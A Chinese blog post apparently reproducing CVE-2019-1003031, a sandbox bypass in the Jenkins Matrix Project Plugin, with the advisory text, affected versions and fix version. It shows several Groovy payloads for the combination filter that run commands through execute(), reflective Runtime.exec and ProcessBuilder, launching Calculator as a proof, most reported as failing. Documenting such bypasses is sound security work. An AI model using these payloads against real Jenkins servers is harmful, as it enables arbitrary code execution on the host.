CVE-2019-1003031:Matrix Project Plugin sandbox绕过

最新推荐文章于 2023-08-03 04:17:34 发布
最新推荐文章于 2023-08-03 04:17:34 发布
阅读量459 收藏
点赞数
分类专栏: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/90552452
版权
安全 同时被 2 个专栏收录
264 篇文章 9 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

影响版本:Matrix Project Plugin <= 1.13
修复建议:升级到1.14或以上
来源:
https://nvd.nist.gov/vuln/detail/CVE-2019-1003031
在这里插入图片描述
官方公告描述:

Matrix Project Plugin supports a sandboxed Groovy expression to filter matrix combinations. Its sandbox protection could be circumvented during parsing, compilation, and script instantiation by providing a crafted Groovy script.
This allowed users able to configure a Matrix project to bypass the sandbox protection and execute arbitrary code on the Jenkins master.

https://jenkins.io/security/advisory/2019-03-06/#SECURITY-1339
中文描述可以参考cnnvd:
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201903-299
插件官方diff:
https://github.com/jenkinsci/matrix-project-plugin/commit/765fc39694b31f8dd6e3d27cf51d1708b5df2be7
在这里插入图片描述
参考:
https://plugins.jenkins.io/matrix-project
https://wiki.jenkins.io/display/JENKINS/Building+a+matrix+project
https://wiki.jenkins.io/display/JENKINS/Script+Security+Plugin
Groovy脚本参考:
https://issues.jenkins-ci.org/browse/JENKINS-49350

在这里插入图片描述

先是使用payload:

(label=="solaris").implies(compiler=="/Applications/Calculator.app/Contents/MacOS/Calculator".execute().text)

然后得到:

No such property: label for class: groovy.lang.Binding

在这里插入图片描述
然后使用payload:

println "/Applications/Calculator.app/Contents/MacOS/Calculator".execute().text

得到
在这里插入图片描述
又尝试了

("".getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("/Applications/Calculator.app/Contents/MacOS/Calculator"))==""


(new java.lang.ProcessBuilder("/Applications/Calculator.app/Contents/MacOS/Calculator").start())==""

依然不可以:
在这里插入图片描述
然后google了一下,找到这些答案:

剩下的参考:
https://xz.aliyun.com/t/5270

caiqiiqi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jenkins插件学习之matrix-project-plugin
马哥私房菜
08-05 2113
今天介绍一个插件 matrix-project-plugin https://github.com/jenkinsci/matrix-project-plugin matrix 矩阵的意思,这个插件在创建的时候又显示 Multi-Configuration Projects 这个名称,中文的界面的话 叫 多配置 项目, 这名称起的着实让人很迷惑, 通过使用,可以看出来是几个参数,或者几个配置, 几个节点的一个全排列组合 这样看就像是矩阵,一共二维表格。 其中有个 User Defined Axis 类型的选
matrix-project-plugin
05-19
矩阵项目插件 在“新建项目”用户界面中,此插件提供以下内容: 多配置项目 如果您的构建将执行许多类似的构建步骤,而您可能会重复这些步骤,则多配置项目非常有用。 配置矩阵 配置矩阵允许您指定要重复的步骤,并创建要创建的构建类型的多轴图。 例如,假设我们有一个要为几个不同的目标alpha,beta创建的构建,并且我们希望同时生成调试和发布输出。 对于自由式作业,我们将具有以下ant命令: Ant: set-target-alpha debug compile Ant: set-target-beta debug compile Ant: set-target-gamma debug compile Ant: set-target-alpha release compile Ant: set-target-beta release compile Ant: set-target-gamma
nodejs VM沙箱绕过
最新发布
qq_44829421的博客
08-03 245
当我们运行一些可能会产生危害的程序,我们不能直接在主机的真实环境上进行测试,所以可以通过单独开辟一个运行代码的环境,它与主机相互隔离,但使用主机的硬件资源,我们将有危害的代码在沙箱中运行只会对沙箱内部产生一些影响,而不会影响到主机上的功能,沙箱的工作机制主要是依靠重定向,将恶意代码的执行目标重定向到沙箱内部。
JS沙箱绕过以及竞争条件型漏洞复现
求大佬师傅带
08-02 617
JS沙箱绕过以及竞争条件型漏洞复现
[CVE-2019-1003000]Jenkins Sandbox Bypass in Script Security and Pipeline Plugins
公众号shadow sock7
05-06 396
参考: https://www.jenkins.io/security/advisory/2019-01-08/ https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc https://www.exploit-db.com/exploits/46453 https://blog.51cto.com/13770310/235274...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
CVE-2019-12814:CVE-2019-12814
05-26
**CVE-2019-12814:Jackson数据绑定库的远程代码执行漏洞** CVE-2019-12814是一个针对Java Jackson数据绑定库的重大安全漏洞,该漏洞允许攻击者通过恶意构造的JSON输入在解析过程中执行任意代码,从而可能导致系统...
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
**sudo CVE-2019-18634 概念证明** sudo(Superuser DO)是Linux和Unix系统中的一个命令行工具,允许普通用户以超级用户(root)或其他用户的身份执行命令,通常用于管理系统。这个概念证明是关于CVE-2019-18634...
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
PoC:Jenkins RCE SECURITY-1266 / CVE-2019-... 更新: 的文章解释了利用CVE-2018-1000861和CVE-2019-1003000的漏洞利用链,绕过了对预身份验证RCE的总体/读取权限的需求: : 安装 $ git clone https://github.co
Jenkins安装以及使用详解
青少儿编程STEAM
08-09 952
目录 8 Jenkins 8.1 Jenkins安装 8.2 allure插件安装 8.3 Jenkins使用 8.4 配置邮件 回到顶部 8Jenkins 8.1 Jenkins安装 Jenkins简介 Jenkins是一个开源软件项目,是开源CI&CD软件领导者,是基于Java开发的一种持续集成工具,提供超过1000个插件来支持构建、部署、自动化,满足任何项目的需要。 CI(Continuous integration,中文意思是持续集成...
MacOS 系统调用本地程序
CoreyXuu的博客
09-28 1270
macOS 系统和Windows系统不同,mac本地程序安装位置为:/System/Applications 所以还醒本地系统程序为:(拿本地计算器程序为例子) /** * @Auther: corey * @Date: 2020/9/28 10:09 * @Description: */ public class ExploitMac { public static void main(String[] args) { try { java.
jenkins自动化工具使用教程(转)
weixin_33881050的博客
03-26 1555
自动化构建、测试、部署、代码检测越来越重要。主要有一下几点原因 企业做大,项目变多,多端支持(web,h5,小程序等) 微服务提倡高内聚低耦合,项目因拆分变多 DevOps自动化运维流行 集群化,高可用部署方案 避免人工操作出现的错误 集成管理系统,实现提交发布、发布审批、发布等UI可视化操作 等等原因,学习使用jenkins实现自动化作业非常有必要。这是我学习过...
player/stage安装 Failed to load plugin stageplugin 解决办法
潜月的博客
05-07 2585
1 首先确认player 和stage 是否都是最新版本 2018.5.7 的最新版本为 stage4.1.1 player3.1.1 player源代码安装 github stage 源代码安装 github 如果是,则进行下一步 2 其次确认是否有stageplugin.so 文件 在路径 usr/local/lib 输入命令 ls|grep stage 查看是否...
实验报告:Project3: Matrix Multiplication
d344498093的专栏
06-20 929
Project3: Matrix Multiplication   一、实验环境 Ubuntu  10.04系统 Eclipse开发平台   二、实验过程: 这个实验中,分别用java、pthread实现多线程矩阵运算。 1、java实现 程序大体思路: 1、新建类WorkThread,作为Runnable的一个接口。传递的参数有,当前计算的行、列,矩阵A、B、C,以及K值,
app提权的方法
ani_di的专栏
06-29 3740
做Mac软件,需要以root帐户运行,所以需要提升app的权限。我记得原来在windows下只需要改一个编译选项即可,不过mac里就不行了。经过一番google,找到了2种提权方法: 1. 通过脚本等执行shell 这可能是最快能想到的方法,毕竟sudo命令太常用了。实现这个方案用applescript比较合适,一句代码即可搞定do shell script "xxxx" with
[UE4]打包运行时提示Plugin ‘‘ failed to load because module ‘‘ could not be found.缺少插件解决方法
qq_45246052的博客
10-27 5396
提示错误如下 Plugin 'Dialoqueplugin' failed to load because module 'DialoguePlugin' could not be found. Please ensure the plugin is properly installed, otherwise consider disabling the plugin for this project. 我使用的是一个对话插件DialoguePlugin 官方链接 Not Yet / Dialo
maven的pom报maven-surefire-plugin却是的解决办法
Changgo在IT路上的一路风景
03-27 1万+
maven的pom报plugins却是的解决方法. 引用 Failure to transfer org.apache.maven.plugins:maven-surefire-plugin:pom:2.7.1 from http://repo1.maven.org/maven2 was cached in the local repository, resolution will n
iframe sandbox 沙盒绕过
热门推荐
12-21 2万+
这个问题实际上就是iframe sandbox 沙盒绕过,iframe通过sandbox属性实现沙箱模式,允许js脚本执行,可直接引用第三方js文件来绕过。禁止iframe 里的javascript 执行 top.location = self.location。 也就是禁止了跳转,绕过了反点击劫持。 案例: <iframe src='2.html' sandbox="allow...
CVE-2019-19781 Citrix漏洞:远程代码执行详解与检测
"本文将深入探讨CVE-2019-19781漏洞,该漏洞影响了Citrix Application Delivery Controller(ADC)和Citrix Gateway,可能导致远程代码执行(RCE)。我们将分析漏洞的成因、检测方法以及利用示例,帮助读者了解其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值